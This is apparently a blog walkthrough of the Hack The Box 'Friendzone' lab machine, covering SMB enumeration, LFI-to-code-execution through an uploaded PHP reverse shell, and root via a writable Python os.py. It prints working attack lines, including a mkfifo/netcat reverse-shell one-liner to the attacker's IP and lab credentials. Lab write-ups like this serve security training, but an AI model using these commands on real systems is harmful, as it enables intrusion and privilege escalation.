HTB – Friendzone

Let’s start off with scanning with the nmap to check open ports.

c:\PENTEST>nmap -sC -sV 10.10.10.123
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-30 14:58 W. Europe Summer Time
Stats: 0:00:38 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.79% done; ETC: 14:58 (0:00:00 remaining)
Stats: 0:00:54 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.79% done; ETC: 14:58 (0:00:00 remaining)
Nmap scan report for administrator1.friendzone.red (10.10.10.123)
Host is up (0.016s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: FriendZone Corp Administrator login page
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h00m36s, deviation: 1h43m54s, median: -37s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2019-08-30T15:57:54+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-08-30 14:57:53
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.62 seconds

c:\PENTEST>

Enumeration

On exploring, vulnerable machine IP in the web browser, it welcomes us with following web page as shown below.

Here also I notice friendzone.red and this could be a clue for proceeding further. As per nmap scan result, port 53 is open for TCP which means there may be some possibilities for DNS Zone Transfer.

I didn’t find any other useful information on the home page, so I try to enumerate web directories with the help of DIRB. But this was also not worthwhile for us because the enumerated result was not valuable when further inspected.

Consequently, I switch to another enumeration service and it was a null session SMB enumeration. So, with the help of SMBmap, which is a Linux utility, we try to enumerate smb shared directories.

root@kali:~/htb# smbmap -H 10.10.10.123 -r
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.123...
[+] IP: 10.10.10.123:445	Name: 10.10.10.123                                      
	Disk                                                  	Permissions
	----                                                  	-----------
	print$                                            	NO ACCESS
	Files                                             	NO ACCESS
	general                                           	READ ONLY
	./                                                 
	dr--r--r--                0 Wed Jan 16 15:10:51 2019	.
	dr--r--r--                0 Wed Jan 23 16:51:02 2019	..
	fr--r--r--               57 Tue Oct  9 19:52:42 2018	creds.txt
	Development                                       	READ, WRITE
	./                                                 
	dr--r--r--                0 Fri Aug 30 09:04:55 2019	.
	dr--r--r--                0 Wed Jan 23 16:51:02 2019	..
	fr--r--r--             5492 Thu Aug 29 08:04:05 2019	php-reverse-shell.php
	IPC$                                              	NO ACCESS
root@kali:~/htb#

I found two shared directories and among those /general had read-only permissions and /Development has read/write both permissions. so, when we accessed /general directory, we obtained a text file named as “creds”.

In this file, I found the following credential which could be used later.

admin:WORKWORKHhallelujah@#

Further, I saved /administrator1.friendzone.red.  in the /etc/hosts file for accessing this domain.

On the exploring administrator1.friendzone.red we got a login portal where I submitted the credential that we have found above.

So, we found another hint “/dashboard.php” which was a web directory.

On enumerating /dashboard.php we found following web page; here it gave a message “image_name param is missing”.

Therefore, we injected “default is image_id=a.jpg&pagename=timestamp” in the URL and obtain following web page where we notice timestamp, and this looked little suspicious towards LFI.

Exploiting LFI

To ensure that I try to call timestamp.php and by obtaining time stamp on the screen it was confirmed that it is vulnerable to LFI. Now let’s extend LFI to RCE to obtain shell of the host machine.

As we knew that /Development is the only directory that has read/write both permissions, hence we can inject our malicious file inside this directory and execute the backdoor by exploiting LFI to obtain a reverse connection.

Then I have used pentest’s monkey php reverse shell with little modification such $lhost & $lport as a backdoor that to be injected inside the host machine.

So, we connect to SMB with the help of smbclient and upload the php-reverse-shell inside /Development. Simultaneously we launched netcat listener in a new terminal to obtain a reverse connection from the host machine.

Then execute the uploaded php backdoor with the privilege of LFI as shown below:

https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&pagename=/etc/Development/php-reverse-shell

As soon as we executed above URL in the browser, we have access netcat session and to obtain proper shell we import python pty one-liner and found our 1st flag inside /home/friend.

C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
connect to [10.10.14.12] from administrator1.friendzone.red [10.10.10.123] 49888
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
15:25:48 up 17:31, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@FriendZone:/$ pwd
pwd
/
www-data@FriendZone:/$ cat /home/friend/user.txt
cat /home/friend/user.txt
a9e*****a11
www-data@FriendZone:/$ cd /var/www
cd /var/www
www-data@FriendZone:/var/www$ ls
ls
admin       friendzoneportal       html             uploads
friendzone  friendzoneportaladmin  mysql_data.conf
www-data@FriendZone:/var/www$ cat mysql_data.conf
cat mysql_data.conf
for development process this is the mysql creds for user friend

db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ

www-data@FriendZone:/var/www$


Privilege Escalation

So, with the help of above-enumerated creds, we try to access ssh and luckily, we connected to ssh and try to identify weak permission file or role for escalating privileges to access root shell or root flag.

C:\Users\jacco>ssh friend@10.10.10.123
friend@10.10.10.123's password: Agpyu12!0.213$
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
You have mail.
Last login: Thu Jan 24 01:20:15 2019 from 10.10.14.3
friend@FriendZone:~$ cd /tmp
friend@FriendZone:/tmp$ ls
systemd-private-22dff15053e947a595068d3196c0fb1f-apache2.service-KTH0XF
systemd-private-22dff15053e947a595068d3196c0fb1f-systemd-resolved.service-efnbiY
systemd-private-22dff15053e947a595068d3196c0fb1f-systemd-timesyncd.service-arbkWm
vmware-root_243-2125741226
friend@FriendZone:/tmp$ wget http://10.10.14.12/pspy64
--2019-08-30 15:39:18-- http://10.10.14.12/pspy64
Connecting to 10.10.14.12:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64 100%[=================================================>] 2.94M 6.73MB/s in 0.4s

2019-08-30 15:39:18 (6.73 MB/s) - ‘pspy64’ saved [3078592/3078592]

friend@FriendZone:/tmp$ chmod 777 pspy64
friend@FriendZone:/tmp$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2019/08/30 15:40:50 CMD: UID=0 PID=98 |
2019/08/30 15:40:50 CMD: UID=0 PID=9 |
2019/08/30 15:40:50 CMD: UID=0 PID=89 |
2019/08/30 15:40:50 CMD: UID=0 PID=859 | /usr/sbin/smbd --foreground --no-process-group
2019/08/30 15:40:50 CMD: UID=0 PID=857 | /usr/sbin/smbd --foreground --no-process-group
2019/08/30 15:40:50 CMD: UID=0 PID=856 | /usr/sbin/smbd --foreground --no-process-group
2019/08/30 15:40:50 CMD: UID=107 PID=853 | /usr/sbin/exim4 -bd -q30m
2019/08/30 15:40:50 CMD: UID=0 PID=85 |
--snip--
2019/08/30 15:40:50 CMD: UID=0 PID=10 |
2019/08/30 15:40:50 CMD: UID=0 PID=1 | /sbin/init splash
2019/08/30 15:42:01 CMD: UID=0 PID=14751 | /bin/sh -c /opt/server_admin/reporter.py
2019/08/30 15:42:01 CMD: UID=0 PID=14750 | /bin/sh -c /opt/server_admin/reporter.py
2019/08/30 15:42:01 CMD: UID=0 PID=14749 | /usr/sbin/CRON -f
^CExiting program... (interrupt)
friend@FriendZone:/tmp$

On running pspy64s, we notice that a python is executing by root which was surprising to us.

So, I decided to take a look at what is script was doing, therefore I used the cat command to read what this script is running. I didn’t find any useful operation is being executed by this script other than import a python library “os.py” hence I take its advantage in privilege escalation.

friend@FriendZone:/tmp$ cat /opt/server_admin/reporter.py
#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer
friend@FriendZone:/tmp$

Taking privilege of python library, we can create a bogus python library named as os.py to call root flag through this file.

friend@FriendZone:/tmp$ ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25952 Aug 30 15:47 /usr/lib/python2.7/os.py
friend@FriendZone:/tmp$ echo "system ('cat /root/root.txt > /tmp/flag')" >> /usr/lib/python2.7/os.py
friend@FriendZone:/tmp$ ls
flag
pspy64
systemd-private-22dff15053e947a595068d3196c0fb1f-apache2.service-KTH0XF
systemd-private-22dff15053e947a595068d3196c0fb1f-systemd-resolved.service-efnbiY
systemd-private-22dff15053e947a595068d3196c0fb1f-systemd-timesyncd.service-arbkWm
vmware-root_243-2125741226
friend@FriendZone:/tmp$ cat flag
b0e*****90c7
friend@FriendZone:/tmp$

or to catch a root shell
friend@FriendZone:/usr/lib/python2.7$ echo "import os
> os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 9876 >/tmp/f')" >> os.py


C:\Users\jacco>nc -lvp 9876
listening on [any] 9876 ...
connect to [10.10.14.12] from administrator1.friendzone.red [10.10.10.123] 59782
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)

Credits to : https://www.hackingarticles.in/hack-the-box-friendzone-walkthrough/

Author: Jacco Straathof

Geplaatst op

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *